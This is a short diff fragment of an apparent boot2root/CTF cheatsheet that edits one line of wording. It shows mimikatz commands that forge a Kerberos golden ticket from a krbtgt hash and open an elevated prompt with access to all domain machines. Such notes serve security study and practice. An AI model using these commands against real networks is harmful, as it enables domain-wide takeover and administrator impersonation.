amirr0r/notes/Infosec/boot2root-cheatsheet.md

 	mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN> /sid:<SID> /krbtgt:<KRBTGT_HASH> /id:500
 	```

-3. Open a new command prompt with elevated privileges to all machines with:
+3. Open a new command prompt with elevated privileges and access to all machines with:

 	```cmd
 	mimikatz # misc::cmd